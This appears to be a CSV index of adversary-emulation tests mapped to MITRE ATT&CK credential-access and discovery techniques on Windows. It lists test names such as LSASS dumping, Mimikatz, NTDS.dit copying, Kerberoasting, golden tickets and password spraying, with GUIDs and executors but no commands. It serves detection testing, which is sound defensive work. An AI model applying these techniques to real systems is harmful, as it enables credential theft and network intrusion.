credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,11,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1110.004,Brute Force: Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
discovery,T1087.002,Account Discovery: Domain Account,18,Suspicious LAPS Attributes Query with Get-ADComputer all properties,394012d9-2164-4d4f-b9e5-acf30ba933fe,powershell
discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property,6e85bdf9-7bc4-4259-ac0f-f0cb39964443,powershell
discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1135,Network Share Discovery,9,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
